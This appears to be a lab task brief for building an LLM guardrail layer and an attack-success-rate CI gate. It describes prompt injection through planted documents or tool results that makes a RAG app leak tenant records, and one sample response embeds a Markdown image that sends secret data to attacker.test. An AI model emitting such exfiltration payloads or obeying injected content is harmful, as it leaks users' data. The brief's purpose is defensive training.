Build a Guardrail Layer and an Attack-Success-Rate CI Gate
Build the defensive control: an input/output guardrail layer that sits in front of a vulnerable LLM app. The starter kit provides the target, a probe battery, and a CI-gate harness that computes attack-success-rate (ASR) over the battery and fails the build when ASR crosses a threshold. The battery and harness serve only as the pass/fail oracle. With your guardrail wired in, battery ASR must drop below the threshold and the gate must exit zero; with the naive starter stub or a planted regression, ASR stays over the line and the gate exits non-zero. A benign control suite must keep passing to prove you have not over-blocked. Write a short remediation rationale and submit the project as a .zip for instant, rubric-based feedback.
Est. time: 3 hrs
Outcomes: 4
Rubric criteria: 7
Pass score: 65%
What you'll learn
Skills you'll have real reps in after shipping this.
The scenario
You own defense for a small Retrieval-Augmented Generation (RAG) assistant or tool-using agent that ships changes weekly. The offensive side has already proved the app is exploitable: a planted document or tool result can drive it into leaking a tenant record or firing an out-of-scope request, and a one-off manual fix does not survive the next prompt refactor. Your lead does not want another patch that quietly regresses. She wants a durable control and a gate that proves the control is still holding on every commit.
Your job is the defensive half of the red-team practice. Build a guardrail layer that mediates what reaches the model and what leaves it, then wire a CI gate that runs an attack battery, computes attack-success-rate, and fails the build when ASR crosses an agreed threshold. The exploit battery is your oracle, not your goal. The deliverable is the guardrail layer plus the gate logic: ASR below threshold with the guardrails on, the gate going red on a planted regression, and a benign control suite that keeps passing so you have not traded security for a broken product.
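As a rough illustration of the gate logic, assume the battery is a list of probes and the oracle is a function that returns True when an attack succeeds. ASR and the exit code might then be computed as below. The names attack_success_rate and gate_exit_code, the four stand-in probes, and the 0.5 threshold are all hypothetical; the starter kit's harness defines the real ones. Treating an ASR exactly equal to the threshold as a failure is also an assumption.

```python
from typing import Callable, Sequence


def attack_success_rate(
    probes: Sequence[str], attack_succeeded: Callable[[str], bool]
) -> float:
    """Return the fraction of probes for which the attack succeeded."""
    if not probes:
        # An empty battery would make the gate pass vacuously, so refuse it.
        raise ValueError("probe battery is empty; ASR is undefined")
    successes = sum(1 for probe in probes if attack_succeeded(probe))
    return successes / len(probes)


def gate_exit_code(asr: float, threshold: float) -> int:
    """Return 0 (green) only when ASR is strictly below the threshold."""
    return 0 if asr < threshold else 1


# Hypothetical stand-ins for the real battery and oracle.
BATTERY = ["probe-a", "probe-b", "probe-c", "probe-d"]
THRESHOLD = 0.5  # assumed value, not taken from the starter kit


def unguarded_oracle(probe: str) -> bool:
    # Naive stub: every probe succeeds against the bare target.
    return True


def guarded_oracle(probe: str) -> bool:
    # With guardrails on, pretend only one probe still gets through.
    return probe == "probe-d"


asr_off = attack_success_rate(BATTERY, unguarded_oracle)
asr_on = attack_success_rate(BATTERY, guarded_oracle)
```

In a CI script, the last step would typically pass the result to sys.exit, for example sys.exit(gate_exit_code(asr_on, THRESHOLD)), so that the build status follows the exit code. A fixed battery and a side-effect-free oracle keep the number reproducible from one commit to the next.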
Your role
You are a defensive security engineer hardening an LLM application and standing up its regression gate. Your goal is a single, self-contained file that builds an input/output guardrail layer in front of a vulnerable target, runs a provided exploit battery as a deterministic oracle to measure attack-success-rate, and acts as a CI gate that fails the build when ASR crosses a threshold. You must show ASR below threshold with the guardrails on, a benign control suite still passing, and the gate firing red on a planted regression then green once it is reverted.
Learning resources
What this task is
This is a build-and-submit defensive-security task, not a quiz about guardrails. You build the control: an input/output guardrail layer that sits in front of a vulnerable LLM app. The starter kit provides the target, the probe battery, and a CI-gate harness that computes attack-success-rate (ASR) over the battery and fails the build when ASR crosses a threshold. The provided battery and harness are the pass/fail oracle, so the center of gravity is the control you ship, not the attack. This is the inverse of the offensive harness task: there you build the harness, here it is given and you build the defense it measures.
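One way to picture a layer that sits in front of the target is a wrapper that takes the target as a callable, screens the input on the way in, and mediates the output on the way out. The sketch below assumes the target is a plain function from prompt string to response string, which may not match the starter kit. The names make_guarded, drop_markdown_images, and vulnerable_target are hypothetical. The output step removes inline Markdown images, since an auto-loaded image URL is a common way to smuggle data out of a rendered response.

```python
import re
from typing import Callable

# Inline Markdown image syntax: ![alt](url). Reference-style images and raw
# HTML <img> tags are NOT covered by this pattern.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\([^)]*\)")


def drop_markdown_images(text: str) -> str:
    """Replace inline Markdown images with a fixed placeholder."""
    return IMAGE_PATTERN.sub("[image removed]", text)


def make_guarded(
    target: Callable[[str], str],
    screen_input: Callable[[str], str],
    mediate_output: Callable[[str], str],
) -> Callable[[str], str]:
    """Wrap a target so every call passes through both guardrail hooks."""

    def guarded(prompt: str) -> str:
        return mediate_output(target(screen_input(prompt)))

    return guarded


def vulnerable_target(prompt: str) -> str:
    # Hypothetical stand-in: a target that has been driven into emitting
    # an exfiltration image regardless of the prompt.
    return "Summary done. ![x](https://attacker.test/c?d=secret)"


guarded_app = make_guarded(
    vulnerable_target,
    screen_input=lambda prompt: prompt,  # identity here; a real screen goes in this slot
    mediate_output=drop_markdown_images,
)

blocked = guarded_app("summarize the document")
benign = drop_markdown_images("See [the docs](https://example.com) for **details**.")
```

Ordinary links and emphasis pass through unchanged, which is the property the benign control suite is meant to check.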
The skill here is durable, measurable defense. You screen or taint what reaches the model and mediate what leaves it with a sink-side control. Examples include an egress allow-list (built with Python's ipaddress module and urllib.parse.urlparse), a safe-markdown subset that drops auto-loaded images, or a parameterized tenant boundary. Then you prove it: ASR falls below the threshold with the guardrails on, a benign control suite keeps passing so you have not over-blocked, and a planted regression pushes ASR back over the line so the gate goes red, then green once reverted. This maps to OWASP LLM01 and LLM05, the OWASP Agentic Top 10 (ASI), and MITRE ATLAS, with the NIST AI RMF Measure and Manage functions as the framing.
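A minimal sketch of the egress allow-list idea, using ipaddress and urlparse from the Python standard library, might look like this. The function name is_egress_allowed and the single allowed host api.example.com are hypothetical. The choices to require https and to reject every IP-literal host are assumptions made for the sketch, not requirements stated in the brief.

```python
import ipaddress
from urllib.parse import urlparse

# Hypothetical allow-list; a real project would load its own hosts.
ALLOWED_HOSTS = frozenset({"api.example.com"})


def is_egress_allowed(url: str) -> bool:
    """Return True only for https URLs whose host is on the allow-list."""
    try:
        parsed = urlparse(url)
        host = parsed.hostname  # lowercased, with userinfo and port stripped
    except ValueError:
        # urlparse raises ValueError on malformed input such as a broken
        # IPv6 bracket; treat anything unparseable as denied.
        return False

    if parsed.scheme != "https" or not host:
        return False

    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # not an IP literal, so fall through to the hostname check
    else:
        # Assumption: IP literals are never allowed, which also blocks
        # loopback and cloud metadata addresses written as raw IPs.
        return False

    return host in ALLOWED_HOSTS
```

Checking parsed.hostname rather than searching the raw string means a URL such as https://api.example.com@evil.test/ is judged by its real host, evil.test. The sketch does not resolve DNS, so a permitted hostname that resolves to an internal address would need a separate check.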
Grading is rubric-based and explainable. Your submission is scored against weighted criteria (the guardrail layer being present and correct, ASR dropping below threshold, the gate going red on a planted regression and green once fixed, the benign suite still passing, a deterministic oracle, and the remediation rationale) with per-criterion feedback. The pass threshold is 65 percent and you can resubmit.